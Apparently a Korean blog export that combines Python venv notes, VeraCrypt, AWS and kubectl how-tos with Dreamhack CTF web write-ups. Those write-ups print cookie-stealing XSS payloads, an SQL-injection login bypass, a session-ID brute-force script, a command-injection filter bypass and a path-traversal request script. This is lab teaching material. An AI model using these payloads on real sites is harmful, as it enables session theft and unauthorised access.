PEP 668 (Python 3.13 이상) Python 3.13부터 배포판에서 제공하는 Python 환경을 보호하기 위한 보안 메커니즘이 도입.

• 시스템 Python에 pip로 직접 패키지를 설치하는 걸 막음
• 패키지 의존성 충돌, 시스템 안정성 문제를 예방

시스템 파이썬은 리눅스 OS 설치 시 함께 제공되는 기본 Python 인터프리터로, 단순히 스크립트를 돌릴 때만 사용하는 게 아닌, OS 내부의 수많은 기능들이 의존하고 있는 핵심 기능이다.

때문에 pip를 통해 패키지를 잘못 설치했다가는 apt가 안먹히거나, 프로그램이 실행이 안되거나, OS 자체가 깨지는 경우가 생길 수 있음.

이를 위해 가상 환경으로 만들어 특정 프로젝트를 위한 영역을 분리할 수 있음.

방법 1

# python3 -m venv [프로젝트 이름]
# source [프로젝트 이름]/bin/activate
# pip install [설치할 패키지]

실행할 경우 유저 이름 앞에 (프로젝트 이름)이 붙음.

비활성화

deactivate

방법 2

sudo apt install pipx 
pipx install [설치할 패키지]

pipx는 자동으로 가상환경을 만들어서 설치해주고 명령어는 글로벌하게 노출시켜줌.

위 방법을 사용하면 시스템 python과 분리시켜 안전하게 python 패키지를 설치, 제거할 수 있게 된다.

소스코드

이전 xss-1과 전체적으로 코드가 유사하지만 한가지 다른점은 xss 필터와 /admin/notice_flag 경로가 추가되었다는 점이다.

@app.route("/vuln")
def vuln():
    param = request.args.get("param", "").lower()
    xss_filter = ["frame", "script", "on"]
    for _ in xss_filter:
        param = param.replace(_, "*")
    return param

xss 필터는 파라미터에 frame, script, on이 들어가면 *로 변환한다. 이 필터로 js 코드를 실행할 수 있는 방법이 거의다 막히기 때문에 js 코드는사용이 불가능해진다.

@app.route("/admin/notice_flag")
def admin_notice_flag():
    global memo_text
    if request.remote_addr != "127.0.0.1":
        return "Access Denied"
    if request.args.get("userid", "") != "admin":
        return "Access Denied 2"
    memo_text += f"[Notice] flag is {FLAG}\n"
    return "Ok"

/admin/notice_flag 경로는 /memo 경로에서 사용되는 memo_text를 전역변수로 선언하고, 2가지 조건을 통과하면 flag 값을 memo_text에 저장한다.

조건은 로컬이면서 get으로 받아온 파라미터 userid가 admin이어야 한다는 것. 즉, get 요청을 내가 보내면 안되고 서버에서 보내게끔 만들어야 한다.

@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", None)
    if text:
        memo_text += text
    return render_template("memo.html", memo=memo_text)

memo_text는 /memo 페이지에서 memo 파라미터의 기본값으로 사용되는데, memo_text는 전역변수이기 때문에 /admin/notice_flag에서 성공적으로 조건문을 통과했다면 프로세스가 유효한 이상 flag 값을 담고 있다. 그래서 한 프로세스에서 /admin/notice_flag에 대한 get 요청과 /memo에 대한 get 요청이 둘 다 성공할 경우, flag 값이 페이지에 출력되게 된다.

흐름으로 보면

/flag -> check_csrf() -> read_url() -> /vuln -> /admin/notice_flag -> /memo

풀이

JS 없이 GET 요청을 전송하는 방법은 <img src="url">이 있다. <img> 태그의 src 속성은 작성한 url에 get 요청을 전송해서 이미지 파일을 받아온다.(POST는 안됌)

테스트를 위해 /vuln 경로에서 <img> 태그의 src 속성으로 /admin/notice_flag와 /memo 경로에 순서대로 get 요청을 보낸다. 코드는 아래와 같다.

<img src="/admin/notice_flag?userid=admin"><img src="/memo?memo=aaaaaa">

/memo 페이지로 이동해보면 제대로 실행된 것을 볼 수 있다.

이제 해당 코드를 /flag 페이지에서 입력.

성공적으로 flag를 받아왔다.

소스코드

@app.route("/vuln")
def vuln():
    return render_template("vuln.html")

소스코드는 이전 xss-1과 비교했을 때 /vuln 경로에서 param을 리턴하는 대신 html 파일 자체를 리턴하는 걸로 바뀐 것을 제외하면 전부 동일하다.

풀이

우선 /vuln 페이지에서 동일하게 스크립트를 작성해본다.

스크립트가 동작하지 않는다.

소스코드를 보니 <script> 태그가 정상적으로 들어가있지만 태그 안쪽의 내용은 단순 문자열 처리를 한 것으로 보인다.

이번엔 <img> 태그를 입력해본다.

<img> 태그는 정상적으로 작동한다.

해당 태그에 js를 실행시킬 수 있는 onerror 속성을 추가하고 이전에 사용했던 리다이렉션 코드를 값으로 입력한다. 이때 에러 발생 유도를 위해 src 속성을 추가해 아무 값이나 입력한다.

<img src="x" onerror="window.location.href='/memo?memo='document.cookie"></img>

풀이

보통 SQLI 취약점을 탐색하기 위해 첫 번째로 ' 또는 "를 넣어 테스트한다.

틀렸다고 나온다.

이번엔 "(쌍따옴표)

쌍따옴표를 넣으니 서버 에러가 출력되었다. 이는 서버에서 "를 query에 넣어 처리한다는 의미이다.

여기에 DB에서 주석을 의미하는 --을 붙여 넣는다.

그러면 패스워드 검증 부분이 주석처리되어 아이디만을 가지고도 로그인이 가능해진다.

소스코드

우선 소스코드부터 확인.

def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("http://127.0.0.1:8000/")
        driver.add_cookie(cookie)
        driver.get(url)
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True

read_url() 이라는 함수가 정의되어 있다. url과 cookie 값을 받아 selenium으로 페이지를 로드한다. driver.add_cookie(cookie)로 입력받은 쿠키를 추가하고 driver.get(url)으로 해당 페이지를 로드한다.

• driver.get(url) : 내부적으로 GET 요청을 보내긴 하지만, 단순히 HTML을 받아오는 것만이 아니라, 페이지의 모든 리소스와 JavaScript도 로드하는 브라우저 기반 GET 요청.

• 브라우저 기반 요청 : 실제 웹 브라우저(Chrome, Firefox, Edge 등)를 실행하여 웹 페이지를 로드하고, 사용자처럼 상호작용하는 방식.

def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    return read_url(url, cookie)

다음은 check_xss(). param과 cookie 값을 받아 url을 생성하고 read_url() 함수의 인자로 넣어 read_url() 함수를 반환한다.

@app.route("/")
def index():
    return render_template("index.html")


@app.route("/vuln")
def vuln():
    param = request.args.get("param", "")
    return param


@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param")
        if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'

다음은 라우팅에 대한 설명이다. 라우팅은 기본 페이지와 /vuln, /flag, /memo가 있는데 /vuln에선 파라미터로 param을 받아 그대로 반환한다. 접속해보면 기본적으로 alert() 함수가 실행되는 걸 볼 수 있다.

중요한 건 /flag. 코드 중간에 if not check_xss() 조건문을 통해 check_xss() 함수에 사용자가 입력한 parma 값과, 쿠키로 flag 값을 전달하고 있다.

memo_text = ""


   @app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\n"
    return render_template("memo.html", memo=memo_text)


app.run(host="0.0.0.0", port=8000)

/memo는 사용자가 파라미터로 전달한 값을 페이지에 영구적으로 작성한다.

해당 페이지에 접속할 때마다 기본적으로 hello라는 문구가 작성된다.

정리해보면 /flag에서 데이터를 전송하면 플래그 값을 쿠키에 담고, param 값을 /vuln 페이지의 파라미터로 입력해 url 변수를 생성한다. 그렇게 생성된 param과 url을 read_url() 함수에 전달해 해당 페이지를 로드한다.

/vuln 페이지는 xss 공격이 실행되는 페이지기 때문에 /flag에서 코드를 작성해 보내면 그대로 실행이 될 것이다. 그럼 코드를 작성해 /memo 경로로 쿠키값을 담아 리다이렉트 시키면 플래그가 /memo 경로에 작성될 것.

풀이

여기에 <script>document.location.href='/memo?memo='+document.cookie</script>를 입력한다.

good이라는 문구가 뜨면 성공적으로 전송된 것. 이제 /memo 페이지로 이동하면 플래그를 확인할 수 있다.

풀이

우측 상단에 로그인 버튼이 보인다.

F12를 눌러 소스코드를 보니 디폴트 계정이 guest/guest라고 나와있다. 해당 계정으로 로그인해보자.

guest로 로그인이 되며 세션 ID가 부여된다.

세션 ID는 로그인 할 때마다 무작위로 변경되는 것으로 보인다.

변하는 값에 어떠한 패턴도 찾지 못해 때려맞추는 건 불가능할 것 같고, 길이가 너무 길어 브루트포스도 소용없을 것 같다.

이쯤에서 문제 파일 확인.

소스코드

#!/usr/bin/python3
from flask import Flask, request, render_template, make_response, redirect, url_for

app = Flask(__name__)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

users = {
    'guest': 'guest',
    'user': 'user1234',
    'admin': FLAG
}


# this is our session storage
session_storage = {
}

users에 guest, user, admin 총 3개의 계정이 있고, 세션 저장소가 생성되어 있다.

@app.route('/')
def index():
    session_id = request.cookies.get('sessionid', None)
    try:
        # get username from session_storage
        username = session_storage[session_id]
    except KeyError:
        return render_template('index.html')

    return render_template('index.html', text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not admin"}')

이 부분은 세션 스토리지에서 세션 아이디 값으로 username을 가져와 username에 맞는 화면을 표시해주는 역할이다. 즉, 세션 아이디 값과 username이 매핑되어 있고, 세션 아이디 값이 틀리면 평범한 index.html 페이지를 받게된다.

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    elif request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        try:
            # you cannot know admin's pw
            pw = users[username]
        except:
            return '<script>alert("not found user");history.go(-1);</script>'
        if pw == password:
            resp = make_response(redirect(url_for('index')) )
            session_id = os.urandom(32).hex()
            session_storage[session_id] = username
            resp.set_cookie('sessionid', session_id)
            return resp
        return '<script>alert("wrong password");history.go(-1);</script>'

입력한 username 값으로 users 리스트에서 패스워드(pw)를 가져온다. 그리고 내가 입력한 패스워드(password)와 비교해 동일할 경우 세션 아이디를 32자 랜덤 값으로 생성 후 세션 아이디와 입력한 username 값을 매핑시켜 세션 스토리지에 저장한다. 정리하면, username과 password를 users에 저장된 대로 정확히 입력했을 때 32자 랜덤 값으로 생성된 세션 아이디를 부여받으며 로그인이 된다.

그렇다면 현재 상황에서는 브루트포스 말고는 로그인 할 방법이 없다. 하지만 아래에 /admin 페이지가 존재하는 것을 볼 수 있다.

@app.route('/admin')
def admin():
    # developer's note: review below commented code and uncomment it (TODO)

    #session_id = request.cookies.get('sessionid', None)
    #username = session_storage[session_id]
    #if username != 'admin':
    #    return render_template('index.html')

    return session_storage

코드를 보면 /admin 경로에 접속했을 때 세션 ID가 admin의 것이 아니면 평범한 index.html을 표시하는 코드가 작성되어 있다. 그러나, return을 제외하고 모든 줄이 주석처리 되어있다. 즉, /admin 경로에 접속하면 누구나 세션 저장소를 확인 가능하다.

접속해보니 실제로 그동안 생성된 세션 아이디가 존재한다. admin 계정에 부여된 세션 아이디로 요청을 보내면 플래그를 얻을 수 있다.

풀이

소스코드

/step1 경로에서 param, param2 값을 입력받고 있는데, param에 getget, param2에 rerequest를 입력할 경우 다음 단계로 redirect된다.

다음 단계에서도 prm1, prm2를 입력 받는데, prm1에 pooost, prm2에 requeeest를 입력하면 flag 페이지로 이동하며 flag 값을 얻을 수 있다.

풀이

param : getget param2 : rerequest

prm1 : pooost prm2 : requeeest

소스코드

users = {
    'guest': 'guest',
    'user': 'user1234',
    'admin': FLAG
}

문제 파일에 있는 app.py를 보면 각 유저 정보가 적혀있는 걸 볼 수 있다.

@app.route('/')
def index():
    session_id = request.cookies.get('sessionid', None)
    try:
        username = session_storage[session_id]
    except KeyError:
        return render_template('index.html')

    return render_template('index.html', text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not admin"}')

그리고 아래에는 username이 admin인 경우 flag 값을 출력하도록 코드가 작성되어있다. sessionid 값을 알아내 admin으로 로그인하면 바로 flag 값이 나오는 구조이다.

if __name__ == '__main__':
    import os
    session_storage[os.urandom(1).hex()] = 'admin'
    print(session_storage)
    app.run(host='0.0.0.0', port=8000)

그리고 맨 아래를 보면 session_storage[os.urandom(1).hex()] = 'admin' 코드가 적혀있는데, 이는 session 저장소에 1바이트의 랜덤 값을 16진수로 변경한 값을 admin의 키로 저장하는 코드이다. 즉, 1바이트의 랜덤 16진수 값을 알아내면 admin으로 로그인이 된다는 의미이다.

1바이트를 16진수로 변환하면 2자리가 나온다. 이를 bruteforce 공격을 통해 알아내보자.

풀이

import requests as req

URL = "http://host1.dreamhack.games:16646/"

for i in range(0xff):

    print("Trying session {}".format(f'{i:02x}'))
    res = req.get(URL, cookies={"sessionid" : f'{i:02x}'})

    if "flag is" in res.text:
        print("----------------------------------\nSuccess Attack")
        print(res.text)
        break;

admin의 sessionid 값은 16진수 2자리이기 때문에 range 인자값을 2자리 16진수 최댓값인 0xff로 입력한다. 그러면 i 값에 0부터 255까지의 정수 값이 차례로 저장된다. 이 값을 get 메서드를 사용해 서버로 요청을 전송할 때 i 값을 16진수로 변환해서 sessionid 키의 값으로 입력해주어야 한다.

16진수 변환은 형식 지정자를 이용한다. f'{i:02x}'에서 02는 2자리 수를 의미하고, x는 소문자 16진수를 의미한다.

마지막으로, 받아온 응답에 "flag is" 문자열이 포함되어 있으면 반복문을 멈추고 받아온 응답을 출력한다.

코드를 실행하면 위처럼 2자리 16진수를 하나씩 대입하다가 "flag is" 문자열을 발견하면 success 구문과 받아온 응답을 출력한다.

Squeezed text 버튼을 눌러보면 전체 응답 코드가 출력되고, 아래로 내려보면 플래그 값을 확인할 수 있다.

풀이

서버에 접속하면 문자들이 마구잡이로 날라다니는 것을 볼 수 있다. 문제 해결을 위해 우선 javascript 코드를 확인한다.

    const img_files = ["/static/images/10.png", "/static/images/17.png", "/static/images/13.png",
                       "/static/images/7.png","/static/images/16.png", "/static/images/8.png",
                       "/static/images/14.png", "/static/images/2.png", "/static/images/9.png",
                       "/static/images/5.png", "/static/images/11.png", "/static/images/6.png",
                       "/static/images/12.png", "/static/images/3.png", "/static/images/0.png",
                       "/static/images/19.png", "/static/images/4.png", "/static/images/15.png"
                       , "/static/images/18.png", "/static/images/1.png"];

소스 코드를 보면 img_files 안에 그림 파일들의 경로를 저장하고 있다. 이 그림들이 날라다니는 문자들 일 것 같다. 해당 경로로 이동해 그림 파일들을 하나씩 확인하는 것도 하나의 방법이다.

    const max_pos = self.innerWidth;
    function anim(elem, pos, dis){
      function move() {
        pos += dis;
        if (pos > max_pos) {
          pos = 0;
        }
        elem.style.transform = `translateX(${pos}px)`;
        requestAnimationFrame(move);
      }
      move();
    }

여기가 중요한 부분인데, 이 부분에 anim() 함수와 move() 함수가 정의되어 있다. anim() 함수는 elem(요소), pos(위치), dis(이동할 값)를 입력받아서 pos에 dis 값을 더하고, translateX() 함수를 사용해 요소를 ${pos}px만큼 X축으로 이동시킨다. 그리고 requestAnimationFrame() 함수를 사용해 move 함수를 재호출한다. 이렇게 되면 스탑 코드가 없기 때문에 위 과정이 무한정 반복된다.

    for(var i = 0; i < 20; i++){
      anim(imgs[i], 0, Math.random()*60+20);
    }

맨 아래에는 anim() 함수에 그림을 순서대로 입력해 위 함수를 실행하는 코드가 작성되어 있다.

정리하면, anim() 함수에 요소와 시작 위치 값, 그리고 이동시킬 값을 입력해 특정 요소를 X축으로 무한정 이동시키고 초기화하고를 반복하는 것이다.

여기서는 이 문제를 콘솔창을 이용해 마지막 for 반복문 코드를 변경해서 해결했다.

for(var i = 0; i < 20; i++){
     anim(imgs[i], 50, 0);
   }

기존 for 반복문을 보면 anim() 함수에 인자를 전달하고 있는데, 여기서 pos와 dis 인자 값을 50, 0으로 변경해주면, 시작 위치가 50px, 증가값이 0이기 때문에 모든 문자가 50px 위치에 고정되어 움직이지 않는다.

이 문자들을 DH{} 내부에 넣어 입력하면 끝.

풀이

서버에 접속해보면 문과 2개의 입력 필드가 보인다.

소스코드를 보면 nickname과 password가 input1,2라는 이름으로 step2.php에 전송되는 것을 볼 수 있다.

그럼 우선 문제 파일에 있는 step2.php 파일 코드를 확인해보자.

<?php
          // POST request
          if ($_SERVER["REQUEST_METHOD"] == "POST") {
            $input_name = $_POST["input1"] ? $_POST["input1"] : "";
            $input_pw = $_POST["input2"] ? $_POST["input2"] : "";

input1,2(nickname, password)를 받아서 변수에 저장하고 있다.

            // pw filtering
            if (preg_match("/[a-zA-Z]/", $input_pw)) {
              echo "alphabet in the pw :(";
            }
            else{
              $name = preg_replace("/nyang/i", "", $input_name);
              $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $input_pw);

패스워드에 알파벳이 포함되면 경고문을 출력, 아닌 경우 정규표현식으로 name 값에서 nyang을 제거하고 있고, 패스워드에서는 특정 패턴을 만족하는 문자열을 d4y0r50ng라는 값으로 변환하고 있다.

              if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") {
                echo '<h4>Step 2 : Almost done...</h4><div class="door_box"><div class="door_black"></div><div class="door"><div class="door_cir"></div></div></div>';

                $cmd = $_POST["cmd"] ? $_POST["cmd"] : "";

name이 dnyang0310이고, pw가 d4y0r50ng+1+13이면 Step2로 넘어가며 cmd 변수가 정의된다.

                if ($cmd === "") {
                  echo '
                        <p><form method="post" action="/step2.php">
                            <input type="hidden" name="input1" value="'.$input_name.'">
                            <input type="hidden" name="input2" value="'.$input_pw.'">
                            <input type="text" placeholder="Command" name="cmd">
                            <input type="submit" value="제출"><br/><br/>
                        </form></p>
                  ';
                }
                // cmd filtering
                else if (preg_match("/flag/i", $cmd)) {
                  echo "<pre>Error!</pre>";
                }
                else{
                  echo "<pre>--Output--\n";
                  system($cmd);
                  echo "</pre>";
                }
              }

cmd에 아무런 값도 입력되지 않으면 cmd 폼을 생성하고, cmd에 값이 입력된 경우에는 입력 값에 flag 문자가 들어있으면 Error! 문구를 출력하고, flag 문자열이 없으면 cmd에 입력된 값을 OS에서 실행한 결과를 출력한다.

그럼 우선적으로 풀어야할 것은 아래 정규 표현식을 통한 검증을 우회하는 것.

            // pw filtering
            if (preg_match("/[a-zA-Z]/", $input_pw)) {
              echo "alphabet in the pw :(";
            }
            else{
              $name = preg_replace("/nyang/i", "", $input_name);
              $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $input_pw);

name 값의 nyang 검증의 경우 preg_replace()는 재귀적으로 검증을 수행하는 것이 아니기 때문에 nynyangang처럼 겹쳐서 사용하면 통과가된다.

pw 값의 정규 표현식을 풀어보면 [숫자 0개 이상]@[숫자 2~3개][31 문자 1개 이상][0부터 8, "이 아닌 문자 1개]! 이다.

💡 정규 표현식 옵션

검증을 통과하려면 name : dnyang0310에 pw : d4y0r50ng+1+13이어야 하기 때문에 아래와 같이 입력한다.

• name : dnynyang0310
• pw : 0@00319!+1+13

그럼 아래와 같이 Step2로 넘어가게 된다.

flag 값은 ../dream/flag.txt에 존재한다고 했지만 flag 문자열을 입력하면 에러가 발생한다. 이를 우회하기 위해 와일드 카드(*)를 사용해 파일을 읽어온다. 와일드 카드는 모든 것을 의미한다. 예를들어, f*는 f로 시작하는 모든 파일, *.txt는 확장자가 txt인 모든 파일을 의미하게 된다.

cat ../dream/*, cat ../dream/f*, cat ../dream/*.txt 등등 여러가지 방법으로 flag.txt 파일을 특정할 수 있다.

풀이

GET, POST 방식으로 데이터를 입력 받는데, POST 방식으로 입력된 값이 정규표현식 패턴에 일치하면 플래그 값을 반환해주는 것으로 보인다.

re.match(r'dr\w{5,7}e\d+am@[a-z]{3,7}\.\w+', input_val)

위에서 사용된 옵션들은 다음과 같다.

💡 정규 표현식 옵션

문자열 앞에 붙은 r은 문자열 내부에 존재하는 백 슬래시가 단순 문자로 처리되도록 만드는 옵션으로 파일 경로나 정규표현식 작성 시 주로 사용된다.

이외에는 단순 문자.

이를 토대로 정규표현식을 풀어보면, dr[문자 5~7개]e[숫자 1개 이상]am@[a부터 z까지 알파벳 중 3~7개].[문자 1개 이상]가 된다.

서버에 접속하면 입력 폼이 존재한다. 여기에 위에서 작성했던 draaaaae0am@aaa.a을 입력하면 바로 플래그가 나온다.

소스코드

중요한 부분만 살펴보면, /get_info 경로에서 GET으로 요청을 받게되면 get_info.html을 반환하고, POST로 요청을 받으면 {API_HOST}/api/user/{userid}에서 정보를 받아와 get_info.html에 추가해 클라이언트에게 반환한다. 여기서 userid는 사용자가 입력하는 값이다. 그럼 userid 대신 ../과 같은 pathtraversal 공격을 사용하면 상위 디렉토리 정보를 받아올 수도 있을 것이다.

또한, /api/flag 경로에 접근하면 FLAG를 반환해준다. FLAG는 flag.txt를 의미한다.

즉, userid 대신 path traversal 공격을 사용해 /api/flag 경로에 접근하면 flag 값을 얻을 수 있을 것이다.

풀이 - Python

페이지에 접속하면 Get User Info 링크가 존재한다. 클릭해서 이동.

이동하면, userid 입력란에 guest가 적힌 것을 볼 수 있고, View를 누르면 해당 유저의 정보를 받아오게 된다.

pathtraversal을 테스트해보기 위해 ../를 입력해본다.

View를 눌러 전송해보면 ../ 값이 Undefined로 변경되어 전송되는 것을 볼 수 있다.

결과로는 아무것도 받아오지 못한다. 특정 값을 프론트엔드 측에서 JS를 이용해 검증하는 것 같다. 이를 우회하려면 Proxy 혹은 python 등을 활용해 프론트엔드 측을 거치지 않고 바로 요청을 전송하는 방법이 있다. 여기서는 python을 사용해 우회한다.

//python http 요청 모듈 requests import
import requests as req

//URL, 파라미터(data) 지정
URL = "http://host3.dreamhack.games:11536/get_info"
data = {"userid" : "../flag"}

res = req.post(URL, data=data)

print(res.text)

이전에 파라미터로 userid만 전송하는 것을 봤기 때문에 userid에 ../flag를 입력해 전송한다.

응답을 확인해보면 중간에 플래그 값이 적혀 있는 것을 볼 수 있다.

풀이-개발자 도구

개발자 도구 > setting > 자바스크립트 사용 중지를 체크하고 userid 입력란에 ../flag를 입력하면 바로 플래그 값을 얻을 수 있다.

• 오픈 소스 암호화 프로그램
• 하나의 디스크에 Standard volume & Hidden volume을 생성하고, 각 volume에 다른 암호를 설정할 수 있다.
• key파일 확장자 hc or key

3GB 정도의 USB를 가지고 실습.

Standard volume 생성

1) VeraCrypt 설치 후 실행

2) volume 만들기

Create Volume 클릭

3) 암호화 대상

1. 암호화된 파일 컨테이너 생성 -> 파일 암호화
2. 비 시스템 파티션/드라이브 암호화 -> HDD, USB 암호화
3. 시스템 파티션 또는 전체 시스템 드라이브 암호화 -> OS 암호화

-> 1번 선택

4) 암호화 대상

1. Standard volume
2. Hidden volume

-> 1번 선택

5) 파일 저장 위치

-> Select File

저장할 폴더에 파일 이름과 파일 형식 .hc로 변경해 저장.

6) 암호화 설정

암호화 알고리즘 : AES Hash 알고리즘 : SHA-512

7) Volume 크기

-> 100MB

8) Volume 패스워드

옵션

1. Use Keyfiles : 암호 대신 키 값이 저장된 파일 사용.
2. Display password : 패스워드 보이게
3. Use PIM : PIM 사용

암호에 추가로 Use Keyfiles 옵션을 추가하면 마운트 시 암호와 Keyfile 둘 다 입력해주어야 마운트할 수 있다.

20자 이하로 설정하면 경고창이 뜨는데 그냥 무시하고 넘어가도 된다.

9) Volume 형식

여기서 마우스를 막 이동시키면 아래 바가 채워지면서 암호화가 높아진다.

10) 생성 완료

이전에 지정한 폴더로 이동해보면 .hc 확장자 파일이 하나 생성되어 있다.

11) 생성된 Volume 마운트

-> Select File 눌러서 .hc 확장자 파일 지정하고, 마운트할 드라이브를 선택

-> 아래 Mount 버튼 클릭

-> 이전에 설정한 패스워드 입력 후 OK

내 컴퓨터로 이동해보면 Q 드라이브가 생성된 것을 볼 수 있다.

12) 마운트 해제

Dismount All을 누르면 마운트가 해제된다.

Hidden Volume 생성

1) Volume 형식 지정

Volume 형식을 Hidden Volume으로 지정.

2) Volume 생성 모드 선택

1. Normal : Standard 생성 후 Hidden 생성
2. Direct : 기존 Volume에 Hidden 생성

3) Standard 파일 지정

이전에 생성한 Standard 파일 지정

4) Outer Volume 패스워드

Outer Volume에서 사용할 패스워드 입력. Standard Volume 생성할 때 입력한 패스워드는 더 이상 사용되지 않고, Outer Volume 패스워드와 Hidden Volume 패스워드 두 개를 사용한다. 이 때, Outer Volume과 hidden Volume 패스워드는 다르게 입력해주어야 한다.

5) Hidden Volume 옵션 설정 시작

-> Next

6) 암호화 방식

7) Volume 크기

-> 50MB

8) Hidden Volume 패스워드

9) Hidden Volume 형식

10) Hidden Volume 생성 완료

-> Exit

11) 마운트

마운트를 할 때 Outer 패스워드를 입력하면 외부 볼륨, Hidden 패스워드를 입력하면 Hidden 볼륨이 마운트된다.

• 외부 볼륨 마운트

• 히든 볼륨 마운트

USB 암호화

이번 문제는 따로 서버가 없기 때문에 문제 파일을 다운로드 받아 HTML 파일을 실행.

풀이 - 개발자 도구

웹 사이트에는 호박이 덩그러니 있고, 아래에 10000번을 더 클릭하라고 나와있다.

우회할 방법을 찾기 위해 소스코드를 확인.

소스코드 내에 스크립트가 존재한다. 이를 해석해보면, 호박(jack-target)을 클릭했을 때 counter 값을 1 증가시킨 후, 만약 counter가 10000 이하이고, 100의 배수인 경우 pie 값에 ((pie ^ 0xff) + (i * 10)) & 0xff 연산을 수행하고 있다. 즉, 단순히 코드를 변경하는 게 아니라 진짜로 10000번을 클릭해야한다.

문제 풀이를 위해 console 창에서 아래 반복문을 실행한다.

i = 0

while(i<10001){
$('jack-target').click();
i++
}

$()는 jquery에서 CSS 선택자를 이용해 특정 요소를 지정하는 구문. 이를 사용해 호박을 지정해준다. 그리고 click() 메서드로 클릭. 이를 10001번 반복한다. 왜냐하면, 10000번 클릭 후 한 번 더 클릭해야 플래그 값을 얻을 수 있기 때문.

실행하면 바로 플래그 값을 얻을 수 있다.

풀이 - Selinux

해결 방법은 여러가지가 있겠지만 여기서는 selenium을 사용한다. 우선, cmd에서 python.exe -m pip install --upgrade pip 명령어로 pip를 업그레이드한다.

그리고 pip install selenium 명령어로 selenium을 설치해준다. 설치가 완료되면 python 코드를 작성한다.

1) 모듈 import

from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By

chrome 웹 드라이버 지정을 위한 webdriver, service 모듈을 import. 그리고 요소 지정 및 특정 행동 실행을 위한 ActionChains와 By 모듈을 import.

2) 드라이버 및 URL 지정

크롬 드라이버는 해당 URL에서 받을 수 있다. 이를 현재 작업 중인 python 파일과 동일한 위치에 옮긴다.

#드라이버 지정
service = Service("chromedriver.exe")
options = webdriver.ChromeOptions()
driver = webdriver.Chrome(service=service, options=options)

#URL 지정
url = 'file:///C:/Users/admin/Downloads/jack-o-lantern.html'

#창 크기 설정
driver.maximize_window()

#창 오픈
driver.get(url)

3) action 실행

#action 객체 생성
action = ActionChains(driver)

#요소 지정
pumkin = driver.find_element(By.ID, "jack-target")
action.move_to_element(pumkin).perform()

특정 행동 수행을 위해 action 객체를 생성하고, 요소를 지정. 호박을 클릭해야하니 호박의 ID 값을 가져와 find_element()의 인자로 입력한다. 호박의 ID 값은 개발자 도구에서 확인 가능하다.

#지정 요소 10001번 클릭
i = 0

while (i<10001):
    pumkin.click()
    i += 1

이제 반복문을 만들어 호박을 10001번 클릭한다.

4) 실행

코드를 실행하면 점점 호박에 얼굴이 생겨나고, 10001번 클릭이 완료되면 플래그 값을 얻을 수 있다.

CloudFormation : VPC, EC2와 같은 리소스들을 템플릿(코드)으로 구성하고 Stack을 생성해 자동 관리할 수 있다. IaC : Infastructure as Code

CloudFormation 메인 페이지에서 스택 생성 클릭

1) 사전 조건 - 템플릿 준비

기존 템플릿 선택

2) 템플릿 지정

템플릿 파일 업로드 선택 -> 아래 파일 선택을 클릭해 미리 작성해놓은 yaml 파일 선택 -> 다음

3) 스택 이름 제공

스택 이름 작성

4) 파라미터

사용할 키 선택 후 다음

5) 스택 옵션 구성

설정 없이 다음

6) 검토 및 작성

설정 값 확인 후 전송

인스턴스

1) 생성 확인

EC2 -> 인스턴스로 가보면 웹 서버 인스턴스가 생성된 것을 볼 수 있다.

아이피를 브라우저에 입력하면 웹 서버 화면이 나온다.

2) 삭제

삭제 할 때는 스택 관리 페이지에서 스택을 삭제해주면 된다.

서버에서 HTTP 서버를 실행하고 해당 아이피로 접속해보면 방화벽 때문에 접속이 되지 않는다. 그래서 포트 포워딩을 해주어야 한다.

인스턴스를 클릭하고 중간으로 내려보면 여러 탭들이 존재한다. 여기서 보안 탭을 클릭.

보안 그룹 클릭

여기서 인바운드 규칙을 생성할 수 있다.

인바운드 규칙 편집 클릭

좌측 하단 규칙 추가 후 HTTP 규칙 추가

유형 : HTTP 소스 유형 : Anywhere-IPv4

위처럼 설정 후 우측 하단 규칙 저장 버튼 클릭

다시 웹 사이트에 접속해보면 기존에 설정한 내용이 출력된다.

kube-ctx (context) : 여러 클러스터 중 원하는 클러스터 선택 kube-ns (namespace) : 단일 클러스터 내의 자원별 격리할 때 구분하는 용도. kube-ps1 : 프롬프트

kube-ctx

1) 설치

k krew install ctx

2) 클러스터 확인

k ctx

3) 클러스터 변경

kube-ns

1) 설치

k krew install ns

2) 네임 스페이스 확인

k ns

3) 네임 스페이스 변경

k ns [namespace]

4) 구성 요소 확인

kube-ps1

1) 설치

git clone https://github.com/jonmosco/kube-ps1.git

여기서 kube-ps1.sh 파일에 실행 권한을 부여해준다.

chmod +x kube-ps1.sh

2) 환경 변수 등록

~/.bashrc 파일 맨 아래 구문 작성

적용을 위해 source ~/.bashrc 실행

실행하면 아래와 같이 쉘이 변경된다.

nginx

1) 설치

k run nginx --image=nginx

kgp -o wide로 pod 목록 확인

2) 삭제

k delete pod nginx

3) 여러 개 생성

k scale deployment httpd --replicas 10

왼쪽 목록 창 열고 모든 서비스로 이동.

컴퓨팅 밑에 EC2 선택

